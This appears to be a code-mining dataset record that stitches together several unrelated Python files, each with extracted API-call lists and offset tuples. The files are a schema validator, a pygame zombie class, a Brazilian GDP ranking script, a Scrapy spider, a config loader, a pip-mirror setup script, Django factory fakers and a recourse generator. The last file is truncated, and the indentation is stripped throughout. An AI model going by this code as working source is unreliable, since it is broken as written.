import rfc3987
from urlparse import urlparse, parse_qsl
from urllib import urlencode
from urllib2 import unquote
from jsonschema import Draft3Validator, RefResolver, FormatChecker
_PATH = dirname(__file__)
def load_schemas():
filename = join(_PATH, "schemas.json")
return dict((s["id"], s) for s in json.load(open(filename)))
_SCHEMAS = load_schemas()
class SlybotJsonSchemaValidator(Draft3Validator):
DEFAULT_TYPES = Draft3Validator.DEFAULT_TYPES.copy()
DEFAULT_TYPES.update({
"mapping": dict,
})
def get_schema_validator(schema):
resolver = RefResolver("", schema, _SCHEMAS)
@FormatChecker.cls_checks('url', (ValueError,))
def is_valid_uri(instance):
if not isinstance(instance, basestring):
return True
uri = urlparse(instance)
query = urlencode(parse_qsl(unquote(uri.query.encode('utf-8'))))
return rfc3987.parse(uri._replace(query=query).geturl(),
rule='URI')
return SlybotJsonSchemaValidator(_SCHEMAS[schema], resolver=resolver,
format_checker=FormatChecker())
def validate_project_schema(specs):
project = specs["project"]
get_schema_validator("project").validate(project)
items = specs["items"]
get_schema_validator("items").validate(items)
extractors = specs["extractors"]
get_schema_validator("extractors").validate(extractors)
spider_schema_validator = get_schema_validator("spider")
for spider in specs["spiders"].values():
spider_schema_validator.validate(spider)
return True
|
[
"jsonschema.FormatChecker.cls_checks",
"jsonschema.Draft3Validator.DEFAULT_TYPES.copy",
"os.path.dirname",
"jsonschema.RefResolver",
"urlparse.urlparse",
"os.path.join",
"jsonschema.FormatChecker"
] |
[((297, 314), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (304, 314), False, 'from os.path import dirname, join\n'), ((352, 379), 'os.path.join', 'join', (['_PATH', '"""schemas.json"""'], {}), "(_PATH, 'schemas.json')\n", (356, 379), False, 'from os.path import dirname, join\n'), ((544, 580), 'jsonschema.Draft3Validator.DEFAULT_TYPES.copy', 'Draft3Validator.DEFAULT_TYPES.copy', ([], {}), '()\n', (578, 580), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n'), ((691, 724), 'jsonschema.RefResolver', 'RefResolver', (['""""""', 'schema', '_SCHEMAS'], {}), "('', schema, _SCHEMAS)\n", (702, 724), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n'), ((731, 777), 'jsonschema.FormatChecker.cls_checks', 'FormatChecker.cls_checks', (['"""url"""', '(ValueError,)'], {}), "('url', (ValueError,))\n", (755, 777), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n'), ((897, 915), 'urlparse.urlparse', 'urlparse', (['instance'], {}), '(instance)\n', (905, 915), False, 'from urlparse import urlparse, parse_qsl\n'), ((1222, 1237), 'jsonschema.FormatChecker', 'FormatChecker', ([], {}), '()\n', (1235, 1237), False, 'from jsonschema import Draft3Validator, RefResolver, FormatChecker\n')]
|
import pygame
from Tile import Tile
from random import randint
from Character import Character
from Character import Direction
__author__ = '<NAME>'
"""
The Zombie class defines a zombie NPC for this game
"""
class Zombie(Character):
# Character definition in map.txt
SPAWN_ZONE = "!"
ORIGINAL_ZOMBIE_IMAGE = pygame.image.load('images/zombie.png')
START_HEALTH = 100
list_ = []
spawn_tiles = []
_velocity = 4
def __init__(self, x, y):
self.direction = Direction.WEST
self.health = Zombie.START_HEALTH
self.img = Zombie.ORIGINAL_ZOMBIE_IMAGE
Character.__init__(self, x, y)
Zombie.list_.append(self)
@staticmethod
def update(screen, survivor):
for zombie in Zombie.list_:
# Draws the zombie image on the screen
screen.blit(zombie.img, (zombie.x, zombie.y))
if survivor.x % Tile.TILE_SIZE == 0 and survivor.y % Tile.TILE_SIZE == 0:
if zombie.x % Tile.TILE_SIZE == 0 and zombie.y % Tile.TILE_SIZE == 0:
survivor_tile_number = survivor.get_number()
N = survivor_tile_number - (Tile.V)
S = survivor_tile_number + (Tile.V)
E = survivor_tile_number + (Tile.H)
W = survivor_tile_number - (Tile.H)
# Tests if the zombie is either on the tile number of the survivor
# or any other adjacent tiles
if zombie.get_number() in [N, S, E, W, survivor_tile_number]:
survivor.health -= 5
if zombie.health <= 0:
Zombie.list_.remove(zombie)
zombie.__movement()
# This method is responsible for the zombie's rotation and movement
def __movement(self):
if self.dx != 0 and self.dy != 0: # Target is set
X = self.x - self.dx
Y = self.y - self.dy
if X < 0: # --->
self.x += Zombie._velocity
self.rotate(Direction.EAST, Zombie.ORIGINAL_ZOMBIE_IMAGE)
elif X > 0: # <----
self.x -= Zombie._velocity
self.rotate(Direction.WEST, Zombie.ORIGINAL_ZOMBIE_IMAGE)
if Y > 0: # up
self.y -= Zombie._velocity
self.rotate(Direction.NORTH, Zombie.ORIGINAL_ZOMBIE_IMAGE)
elif Y < 0: # down
self.y += Zombie._velocity
self.rotate(Direction.SOUTH, Zombie.ORIGINAL_ZOMBIE_IMAGE)
if X == 0 and Y == 0:
self.dx, self.dy = 0, 0
@staticmethod
def spawn(total_frames, FPS):
# spawn a new zombie every FPS frames
if total_frames % (FPS) == 0:
# Perform a sound effect somewhat periodically
if total_frames % (FPS * 6) == 0:
random_sound_effect = randint(0, 2)
# TURNED OFF SOUND FOR DEBUGGING
"""
sounds = [pygame.mixer.Sound('audio/zs1.ogg'),
pygame.mixer.Sound('audio/zs2.ogg'),
pygame.mixer.Sound('audio/zs3.ogg')]
sound = sounds[ random_sound_effect ]
sound.play()
"""
# Get the spawn tile number, get the tile itself and create a zombie there
random_spawn_zone = randint(0, len(Zombie.spawn_tiles) - 1)
tile_num = Zombie.spawn_tiles[random_spawn_zone]
spawn_node = Tile.get_tile(tile_num)
Zombie(spawn_node.x, spawn_node.y)
|
[
"pygame.image.load",
"Tile.Tile.get_tile",
"random.randint",
"Character.Character.__init__"
] |
[((326, 364), 'pygame.image.load', 'pygame.image.load', (['"""images/zombie.png"""'], {}), "('images/zombie.png')\n", (343, 364), False, 'import pygame\n'), ((615, 645), 'Character.Character.__init__', 'Character.__init__', (['self', 'x', 'y'], {}), '(self, x, y)\n', (633, 645), False, 'from Character import Character\n'), ((3534, 3557), 'Tile.Tile.get_tile', 'Tile.get_tile', (['tile_num'], {}), '(tile_num)\n', (3547, 3557), False, 'from Tile import Tile\n'), ((2913, 2926), 'random.randint', 'randint', (['(0)', '(2)'], {}), '(0, 2)\n', (2920, 2926), False, 'from random import randint\n')]
|
#-*- coding:utf-8 -*-
# Importando Bibliotecas
import os
import funcoes
arquivo = funcoes.open_file_mod()
#-------------------------------------------------------------------------------------------------------
q2 = input("Deseja passar um ano para saber o Ranking de Pib per capita por estado(caso não queira mandaremos o ano default)[S/N]? ").upper().strip()
while q2 not in ['S','N','SIM','NÃO','NAO']:
q2 = input("Digite apenas ['S' para sim ou 'N' para não). Deseja passar um ano para saber o Ranking de Pib per capita por estado? ").upper().strip()
if q2 in ['S','SIM']:
ano = None
try:
ano = int(input("Qual ano você deseja obter o Ranking? "))
except ValueError as err:
print("O ano precisa ser um número do tipo inteiro - erro: ", err)
while ((ano not in range(2010,2019)) and (ano not in [-1])):
try:
ano = int(input("O ano precisa ser um número inteiro entre 2010 e 2018. Qual ano você deseja obter o Ranking? Ou digite -1 para usar valor default: "))
except ValueError as err:
print("O ano precisa ser um número do tipo inteiro", err)
if ano == -1:
ano = 2010
else:
ano = 2010
dict_estados ={}
for linha in arquivo:
dict_estados['manus'] = None
i = 0
qtd_cidades = 0 # armazena a quantidade de registros presentes na base para a cidade e estado escolhidos
pib_estado = 0 # armazena a soma de pib per capita de todos os anos para cidade escolhida
for key in dict_estados:
for linha in arquivo:
if ((int(linha[0]) == ano) and (linha[2] == key)):
pib_estado += float(linha[13])
qtd_cidades+=1
media = pib_estado/qtd_cidades
qtd_cidades = 0
pib_estado = 0
dict_estados[key]= round(media,2)
ocorrencias = []
for idx,item in enumerate(sorted(dict_estados, key = dict_estados.get,reverse=True)):
print (f'{idx+1} - {item} - R${dict_estados[item]}')
ocorrencias.append(f'{idx+1:4}{" "*4} - {item:19} - R${dict_estados[item]:>10.2f}')
def mostrar_ranking():
s = open('questao_02/saida_q2.txt','a', encoding="utf-8")
s.write(f"RANKING {ano} - PIB PER CAPTA MÉDIO TODOS OS ESTADOS\n")
s.write('Posição - Estado - Pib per capta médio\n')
for n in ocorrencias:
s.write(f'{n}\n')
s.close()
# condicional para verificar se o arquivo ja existe, caso exista o programa apaga o arquivo e o recria, chamando a funcao anteriormente criada
if os.path.exists('questao_02/saida_q2.txt'): #verificando se existe o caminho
os.remove('questao_02/saida_q2.txt')
mostrar_ranking()
# caso ainda não exista, ele apenas cria o arquivo e escreve os dados
else:
mostrar_ranking()
|
[
"os.remove",
"os.path.exists",
"funcoes.open_file_mod"
] |
[((83, 106), 'funcoes.open_file_mod', 'funcoes.open_file_mod', ([], {}), '()\n', (104, 106), False, 'import funcoes\n'), ((2469, 2510), 'os.path.exists', 'os.path.exists', (['"""questao_02/saida_q2.txt"""'], {}), "('questao_02/saida_q2.txt')\n", (2483, 2510), False, 'import os\n'), ((2549, 2585), 'os.remove', 'os.remove', (['"""questao_02/saida_q2.txt"""'], {}), "('questao_02/saida_q2.txt')\n", (2558, 2585), False, 'import os\n')]
|
import scrapy
import json5
class XqbotSpider(scrapy.Spider):
name = 'dmt'
allowed_domains = ['www.xueqiu.com']
start_urls = ['https://xueqiu.com/P/ZH2126346',
'https://xueqiu.com/P/ZH2268976',
]
def parse(self, response):
# pass
#print(response.text)
#page = response.url.split("/")[-1]
# filename = f'xueqiu{page}.html'
#with open(filename, 'wb') as f:
# f.write(response.body)
# # f.write(response.text)
# self.log(f'Saved file {filename}')
html = response.text
pos_start = html.find('SNB.cubeInfo = ') + len('SNB.cubeInfo = ')
pos_end = html.find('SNB.cubePieData')
data = html[pos_start:pos_end]
#print(data)
data = data.rstrip() # get rid of ending space
data = data[:-1] # get rid of the last ";"
dic = json5.loads(data)
#print('********************')
#name = dic['name']
#print(name.encode('utf-8'))
#print(dic['name'].encode('utf-8'))
#print('********************')
scraped_data = {
'name' : dic['name'],
'symbol' : dic['symbol'],
'daily_gain' : dic['daily_gain'],
'monthly_gain' : dic['monthly_gain'],
'total_gain' : dic['total_gain'],
'net_value' : dic['net_value'],
'rank_percent' : dic['rank_percent'],
'annualized_gain_rate' : dic['annualized_gain_rate'],
'bb_rate' : dic['bb_rate'],
}
#print(scraped_data)
yield scraped_data
|
[
"json5.loads"
] |
[((881, 898), 'json5.loads', 'json5.loads', (['data'], {}), '(data)\n', (892, 898), False, 'import json5\n')]
|
from abc import ABC
from typing import Hashable, Any
from pathlib import Path
from os import getenv
import logging
import yaml
class ConfigLocationError(Exception):
pass
class BaseConfig(ABC):
def __init__(self):
self.log = logging.getLogger(self.__class__.__name__)
@property
def as_dict(self) -> dict[Hashable, Any]:
raise NotImplementedError()
@property
def username(self) -> str:
raise NotImplementedError()
@property
def password(self) -> str:
raise NotImplementedError()
@property
def contact_points(self) -> list[str]:
raise NotImplementedError()
@property
def keyspace_name(self) -> str:
raise NotImplementedError()
class FileConfig(BaseConfig):
@property
def username(self):
return self.as_dict.get("username")
@property
def password(self) -> str:
return self.as_dict.get("password")
@property
def contact_points(self) -> list[str]:
return self.as_dict.get("contact_points")
@property
def keyspace_name(self) -> str:
return self.as_dict.get("keyspace_name")
DEFAULT_CONFIG_PATHS = (
"argus.local.yaml",
"argus.yaml",
getenv("HOME") + "/.argus.yaml"
)
def __init__(self, filepath: str = None):
super().__init__()
if not filepath:
for file in self.DEFAULT_CONFIG_PATHS:
self.log.info("Trying %s", file)
if Path(file).exists():
filepath = file
break
if not filepath:
self.log.error("All config locations were tried and no config file found")
raise ConfigLocationError("No config file supplied and no config exists at default location")
self.filepath = filepath
self._credentials = None
@property
def as_dict(self) -> dict[Hashable, Any]:
if self._credentials:
return self._credentials
path = Path(self.filepath)
if not path.exists():
raise ConfigLocationError(f"File not found: {self.filepath}")
with open(path.absolute(), "rt", encoding="utf-8") as file:
self._credentials = yaml.safe_load(file)
return self._credentials
class Config(BaseConfig):
@property
def username(self) -> str:
return self.as_dict.get("username")
@property
def password(self) -> str:
return self.as_dict.get("password")
@property
def contact_points(self) -> list[str]:
return self.as_dict.get("contact_points")
@property
def keyspace_name(self) -> str:
return self.as_dict.get("keyspace_name")
def __init__(self, username: str, password: str, contact_points: list[str], keyspace_name: str):
super().__init__()
self._config = {
"username": username,
"password": password,
"contact_points": contact_points,
"keyspace_name": keyspace_name,
}
@property
def as_dict(self) -> dict[Hashable, Any]:
return self._config
|
[
"pathlib.Path",
"yaml.safe_load",
"os.getenv",
"logging.getLogger"
] |
[((244, 286), 'logging.getLogger', 'logging.getLogger', (['self.__class__.__name__'], {}), '(self.__class__.__name__)\n', (261, 286), False, 'import logging\n'), ((1997, 2016), 'pathlib.Path', 'Path', (['self.filepath'], {}), '(self.filepath)\n', (2001, 2016), False, 'from pathlib import Path\n'), ((1229, 1243), 'os.getenv', 'getenv', (['"""HOME"""'], {}), "('HOME')\n", (1235, 1243), False, 'from os import getenv\n'), ((2222, 2242), 'yaml.safe_load', 'yaml.safe_load', (['file'], {}), '(file)\n', (2236, 2242), False, 'import yaml\n'), ((1485, 1495), 'pathlib.Path', 'Path', (['file'], {}), '(file)\n', (1489, 1495), False, 'from pathlib import Path\n')]
|
'''
PyPi 更换为国内镜像源
'''
import sys
import os
mirrors = '''\
[global]
timeout = 60
index-url = https://mirrors.ustc.edu.cn/pypi/web/simple/
extra-index-url = https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple/\
'''
user = os.path.expanduser('~')
if sys.platform == 'win32':
os.mkdir(f"{user}/AppData/Roaming/pip")
with open(f"{user}/AppData/Roaming/pip/pip.ini", 'w', encoding='utf-8') as fp:
fp.write(mirrors)
elif sys.platform == 'linux' or sys.platform == 'darwin':
os.mkdir(f"{user}/.pip")
with open(f"{user}/.pip/pip.conf", 'w', encoding='utf-8') as fp:
fp.write(mirrors)
|
[
"os.mkdir",
"os.path.expanduser"
] |
[((228, 251), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (246, 251), False, 'import os\n'), ((284, 323), 'os.mkdir', 'os.mkdir', (['f"""{user}/AppData/Roaming/pip"""'], {}), "(f'{user}/AppData/Roaming/pip')\n", (292, 323), False, 'import os\n'), ((495, 519), 'os.mkdir', 'os.mkdir', (['f"""{user}/.pip"""'], {}), "(f'{user}/.pip')\n", (503, 519), False, 'import os\n')]
|
from django.conf import settings
from django.template.loader import render_to_string
class FieldFaker:
"""
Base class to return faker and kwargs
for a given model field
:faker - the Faker method to be called
:faker_kwargs - the kwargs to be passed to the faker method
:unquote_kwargs - the kwargs that need to be displayed without quote
:template - the template to use to render the Faker field
"""
faker_class = ''
faker_kwargs = []
unquote_kwargs = []
imports = []
template = "factory_generator/default.py-tpl"
def __init__(self, model, field):
self.model = model
self.field = field
self.root_dir = getattr(settings, 'FACTORY_ROOT_DIR', 'model_factories')
super(FieldFaker, self).__init__()
@property
def context(self):
"""
Return the context needed to properly define the faker
"""
return {
'faker_class': self.get_faker_class(),
'faker_kwargs': self.get_faker_kwargs(),
'field': self.field
}
def render(self):
return render_to_string(self.template, self.context)
def get_faker_class(self):
return self.faker_class
def get_faker_kwargs(self):
"""
Get kwargs for the faker instance
"""
if len(self.faker_kwargs) == 0:
return ''
kwargs = {}
for kwarg in self.faker_kwargs:
method = "get_{kwarg}".format(kwarg=kwarg)
if hasattr(self, method):
kwargs[kwarg] = getattr(self, method)()
else:
if hasattr(self, kwarg):
kwargs[kwarg] = getattr(self, kwarg)
else:
raise ValueError('Missing property `{kwarg}` or method `get_{kwarg}`for `{class_name}`'.format(
class_name=self.__class__.__name__,
kwarg=kwarg
))
arr = []
for (key,val) in kwargs.items():
if key in self.unquote_kwargs:
arr.append("{!s}={!s}".format(key,val))
else:
arr.append("{!s}={!r}".format(key,val))
return ', '.join(arr)
class BigIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return -9223372036854775808
def get_max(self):
return 9223372036854775807
class BinaryFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "length"]
provider = "binary"
length = 300
class BooleanFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "elements"]
provider = "random_element"
def get_elements(self):
if self.field.null:
return (None, True, False)
else:
return (True, False)
class CharFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "max_chars"]
provider = "pystr"
def get_max_chars(self):
return self.field.max_length
class ChoiceFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "elements"]
unquote_kwargs = ["elements"]
provider = "random_element"
def get_elements(self):
return "{field_name}_CHOICES".format(
field_name = self.field.name.upper()
)
class DateFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime", "tzinfo"]
unquote_kwargs = ["tzinfo"]
provider = "date_time"
imports = ['django.utils.timezone']
def get_end_datetime(self):
return None
def get_tzinfo(self):
return "timezone.get_current_timezone()"
class DateTimeFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime", "tzinfo"]
provider = "date_time"
unquote_kwargs = ["tzinfo"]
imports = ['django.utils.timezone']
def get_end_datetime(self):
return None
def get_tzinfo(self):
return "timezone.get_current_timezone()"
class DecimalFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "left_digits", "right_digits", "positive"]
provider = "pydecimal"
def get_positive(self):
return None
def get_left_digits(self):
return self.field.max_digits - self.field.decimal_places
def get_right_digits(self):
return self.field.decimal_places
class DurationFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime"]
provider = "time_delta"
imports = ['django.utils.timezone']
def get_end_datetime(self):
return None
class EmailFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "safe_email"
class FileFieldFaker(FieldFaker):
faker_class = "factory.django.FileField"
class FilePathFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "file_path"
class FloatFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "left_digits", "right_digits", "positive"]
provider = "pyfloat"
def get_positive(self):
return None
def get_left_digits(self):
return None
def get_right_digits(self):
return None
class ForeignKeyFaker(FieldFaker):
faker_class = "factory.SubFactory"
faker_kwargs = ["factory"]
def get_factory(self):
to = self.field.remote_field.model.__name__
app_label = self.field.remote_field.model._meta.app_label
return "{root_dir}.{app_label}.{to}Factory".format(
root_dir=self.root_dir,
app_label=app_label,
to=to
)
class ImageFieldFaker(FieldFaker):
faker_class = "factory.django.ImageField"
class IntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return -2147483648
def get_max(self):
return 2147483647
class GenericIPAddressFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
def get_provider(self):
if self.field.protocol == 'both':
return random.choice(['ipv4', 'ipv6'])
if self.field.protocol == 'IPv4':
return 'ipv4'
if self.field.protocol == 'IPv4':
return 'ipv6'
class ManyToManyFieldFaker(FieldFaker):
faker_class = None
template = "factory_generator/manytomany.py-tpl"
class NullBooleanFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "elements"]
provider = "random_element"
elements = (None, True, False)
class OneToOneFieldFaker(FieldFaker):
faker_class = "factory.SubFactory"
faker_kwargs = ["factory"]
def get_factory(self):
to = self.field.remote_field.model.__name__
app_label = self.field.remote_field.model._meta.app_label
return "{root_dir}.{app_label}.{to}Factory".format(
root_dir=self.root_dir,
app_label=app_label,
to=to
)
class PositiveIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return 0
def get_max(self):
return 2147483647
class PositiveSmallIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return 0
def get_max(self):
return 32767
class SlugFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "slug"
class SmallIntegerFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "min", "max"]
provider = "random_int"
def get_min(self):
return -32768
def get_max(self):
return 32767
class TextFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "text"
class TimeFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider", "end_datetime"]
provider = "time_object"
end_datetime = None
imports = ['django.utils.timezone']
class URLFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "url"
class UUIDFieldFaker(FieldFaker):
faker_class = "factory.Faker"
faker_kwargs = ["provider"]
provider = "uuid4"
class PointFieldFaker(FieldFaker):
faker_class = "factory.LazyFunction"
faker_kwargs = ["function"]
unquote_kwargs = ["function"]
imports = ['factory_generator.fields_faker.PointFieldFaker']
function = "PointFieldFaker.get_random_point"
@staticmethod
def get_random_point():
from django.contrib.gis.geos import Point
from faker import Faker
fake = Faker()
return Point(float(fake.longitude()), float(fake.latitude()))
BASE_FIELD_FAKER_MAP = {
"BigIntegerField": "factory_generator.fields_faker.BigIntegerFieldFaker",
"BinaryField": "factory_generator.fields_faker.BinaryFieldFaker",
"BooleanField": "factory_generator.fields_faker.BooleanFieldFaker",
"CharField": "factory_generator.fields_faker.CharFieldFaker",
"ChoiceField": "factory_generator.fields_faker.ChoiceFieldFaker",
"DateField": "factory_generator.fields_faker.DateFieldFaker",
"DateTimeField": "factory_generator.fields_faker.DateTimeFieldFaker",
"DecimalField": "factory_generator.fields_faker.DecimalFieldFaker",
"DurationField": "factory_generator.fields_faker.DurationFieldFaker",
"EmailField": "factory_generator.fields_faker.EmailFieldFaker",
"FileField": "factory_generator.fields_faker.FileFieldFaker",
"FilePathField": "factory_generator.fields_faker.FilePathFieldFaker",
"FloatField": "factory_generator.fields_faker.FloatFieldFaker",
"ForeignKey": "factory_generator.fields_faker.ForeignKeyFaker",
"ImageField": "factory_generator.fields_faker.ImageFieldFaker",
"IntegerField": "factory_generator.fields_faker.IntegerFieldFaker",
"GenericIPAddressField": "factory_generator.fields_faker.GenericIPAddressFieldFaker",
"ManyToManyField": "factory_generator.fields_faker.ManyToManyFieldFaker",
"NullBooleanField": "factory_generator.fields_faker.NullBooleanFieldFaker",
"OneToOneField": "factory_generator.fields_faker.OneToOneFieldFaker",
"PositiveIntegerField": "factory_generator.fields_faker.PositiveIntegerFieldFaker",
"PositiveSmallIntegerField": "factory_generator.fields_faker.PositiveSmallIntegerFieldFaker",
"SlugField": "factory_generator.fields_faker.SlugFieldFaker",
"SmallIntegerField": "factory_generator.fields_faker.SmallIntegerFieldFaker",
"TextField": "factory_generator.fields_faker.TextFieldFaker",
"TimeField": "factory_generator.fields_faker.TimeFieldFaker",
"URLField": "factory_generator.fields_faker.URLFieldFaker",
"UUIDField": "factory_generator.fields_faker.UUIDFieldFaker",
"PointField": "factory_generator.fields_faker.PointFieldFaker",
}
def get_field_faker_map():
base_field_faker_map = getattr(settings, 'FACTORY_FIELD_FAKER_MAP', {})
field_faker_map = BASE_FIELD_FAKER_MAP.copy()
field_faker_map.update(base_field_faker_map)
return field_faker_map
FIELD_FAKER_MAP = get_field_faker_map()
|
[
"django.template.loader.render_to_string",
"faker.Faker"
] |
[((1115, 1160), 'django.template.loader.render_to_string', 'render_to_string', (['self.template', 'self.context'], {}), '(self.template, self.context)\n', (1131, 1160), False, 'from django.template.loader import render_to_string\n'), ((9195, 9202), 'faker.Faker', 'Faker', ([], {}), '()\n', (9200, 9202), False, 'from faker import Faker\n')]
|
import os
import time
import numpy as np
import pandas as pd
import normalizedDistance
from pprint import pprint
from recourse.builder import RecourseBuilder
from recourse.builder import ActionSet
def genExp(model_trained, factual_sample, norm_type, dataset_obj):
start_time = time.time()
# SIMPLE HACK!!
# ActionSet() construction demands that all variables have a range to them. In
# the case of one-hot ordinal variables (e.g., x2_ord_0, x2_ord_1, x2_ord_2)),
# the first sub-category (i.e., x2_ord_0) will always have range(1,1), failing
# the requirements of ActionSet(). Therefore, we add a DUMMY ROW to the data-
# frame, which is a copy of another row (so not to throw off the range of other
# attributes), but setting a 0 value to all _ord_ variables. (might as well do
# this for all _cat_ variables as well).
tmp_df = dataset_obj.data_frame_kurz
sample_row = tmp_df.loc[0].to_dict()
for attr_name_kurz in dataset_obj.getOneHotAttributesNames('kurz'):
sample_row[attr_name_kurz] = 0
tmp_df = tmp_df.append(pd.Series(sample_row), ignore_index=True)
df = tmp_df
X = df.loc[:, df.columns != 'y']
# Enforce binary, categorical (including ordinal) variables only take on 2 values
custom_bounds = {attr_name_kurz: (0, 100, 'p') for attr_name_kurz in np.union1d(
dataset_obj.getOneHotAttributesNames('kurz'),
dataset_obj.getBinaryAttributeNames('kurz')
)}
action_set = ActionSet(X = X, custom_bounds = custom_bounds)
# action_set['x1'].mutable = False # x1 = 'Race'
# In the current implementation, we only supports any/none actionability
for attr_name_kurz in dataset_obj.getInputAttributeNames('kurz'):
attr_obj = dataset_obj.attributes_kurz[attr_name_kurz]
if attr_obj.actionability == 'none':
action_set[attr_name_kurz].mutable = False
elif attr_obj.actionability == 'any':
continue # do nothing
else:
raise ValueError(f'Actionable Recourse does not support actionability type {attr_obj.actionability}')
# Enforce search over integer-based grid for integer-based variables
for attr_name_kurz in np.union1d(
dataset_obj.getIntegerBasedAttributeNames('kurz'),
dataset_obj.getBinaryAttributeNames('kurz'),
):
action_set[attr_name_kurz].step_type = "absolute"
action_set[attr_name_kurz].step_size = 1
coefficients = model_trained.coef_[0]
intercept = model_trained.intercept_[0]
if norm_type == 'one_norm':
mip_cost_type = 'total'
elif norm_type == 'infty_norm':
mip_cost_type = 'max'
else:
raise ValueError(f'Actionable Recourse does not support norm_type {norm_type}')
factual_sample_values = list(factual_sample.values())
# p = .8
rb = RecourseBuilder(
optimizer="cplex",
coefficients=coefficients,
intercept=intercept, # - (np.log(p / (1. - p))),
action_set=action_set,
x=factual_sample_values,
mip_cost_type=mip_cost_type
)
output = rb.fit()
counterfactual_sample_values = np.add(factual_sample_values, output['actions'])
counterfactual_sample = dict(zip(factual_sample.keys(), counterfactual_sample_values))
# factual_sample['y'] = False
# counterfactual_sample['y'] = True
counterfactual_sample['y'] = not factual_sample['y']
counterfactual_plausible = True
# IMPORTANT: no need to check for integer-based / binary-based plausibility,
# because those were set above when we said step_type = absolute! Just round!
for attr_name_kurz in np.union1d(
dataset_obj.getOneHotAttributesNames('kurz'),
dataset_obj.getBinaryAttributeNames('kurz')
):
try:
assert np.isclose(
counterfactual_sample[attr_name_kurz],
np.round(counterfactual_sample[attr_name_kurz])
)
counterfactual_sample[attr_name_kurz] = np.round(counterfactual_sample[attr_name_kurz])
except:
distance = -1
counterfactual_plausible = False
# return counterfactual_sample, distance
# Perform plausibility-data-type check! Remember, all ordinal variables
# have already been converted to categorical variables. It is important now
# to check that 1 (and only 1) sub-category is activated in the resulting
# counterfactual sample.
already_considered = []
for attr_name_kurz in dataset_obj.getOneHotAttributesNames('kurz'):
if attr_name_kurz not in already_considered:
siblings_kurz = dataset_obj.getSiblingsFor(attr_name_kurz)
activations_for_category = [
counterfactual_sample[attr_name_kurz] for attr_name_kurz in siblings_kurz
]
sum_activations_for_category = np.sum(activations_for_category)
if 'cat' in dataset_obj.attributes_kurz[attr_name_kurz].attr_type:
if sum_activations_for_category == 1:
continue
else:
# print('not plausible, fixing..', end='')
# TODO: don't actually return early! Instead see the actual distance,
# fingers crossed that we can say that not only is their method giving
# counterfactuals are larger distances, but in a lot of cases they are
# not data-type plausible
# INSTEAD, do below:
# Convert to correct categorical/ordinal activations so we can
# compute the distance using already written function.
# Turns out we need to do nothing, because the distance between
# [0,1,0] and anything other than itself, (e.g., [1,1,0] or [1,0,1])
# is always 1 :)
# continue
distance = -1
counterfactual_plausible = False
# return counterfactual_sample, distance
elif 'ord' in dataset_obj.attributes_kurz[attr_name_kurz].attr_type:
# TODO: assert activations are in order...
# if not, repeat as above...
for idx in range(int(sum_activations_for_category)):
if activations_for_category[idx] != 1:
# Convert to correct categorical/ordinal activations so we can
# compute the distance using already written function.
# Find the max index of 1 in the array, and set everything before that to 1
# print('not plausible, fixing..', end='')
# max_index_of_1 = np.where(np.array(activations_for_category) == 1)[0][-1]
# for idx2 in range(max_index_of_1 + 1):
# counterfactual_sample[siblings_kurz[idx2]] = 1
# break
distance = -1
counterfactual_plausible = False
# return counterfactual_sample, distance
else:
raise Exception(f'{attr_name_kurz} must include either `cat` or `ord`.')
already_considered.extend(siblings_kurz)
# TODO: convert to correct categorical/ordinal activations so we can compute
# distance = output['cost'] # TODO: this must change / be verified!???
distance = normalizedDistance.getDistanceBetweenSamples(
factual_sample,
counterfactual_sample,
norm_type,
dataset_obj
)
# # TODO: post-feasibible needed???? NO
# # make plausible by rounding all non-numeric-real attributes to
# # nearest value in range
# for idx, elem in enumerate(es_instance):
# attr_name_kurz = dataset_obj.getInputAttributeNames('kurz')[idx]
# attr_obj = dataset_obj.attributes_kurz[attr_name_kurz]
# if attr_obj.attr_type != 'numeric-real':
# # round() might give a value that is NOT in plausible.
# # instead find the nearest plausible value
# es_instance[idx] = min(
# list(range(int(attr_obj.lower_bound), int(attr_obj.upper_bound) + 1)),
# key = lambda x : abs(x - es_instance[idx])
# )
end_time = time.time()
return {
'factual_sample': factual_sample,
'cfe_sample': counterfactual_sample,
'cfe_found': True, # TODO?
'cfe_plausible': counterfactual_plausible,
'cfe_distance': distance,
'cfe_time': end_time - start_time,
}
|
[
"numpy.sum",
"time.time",
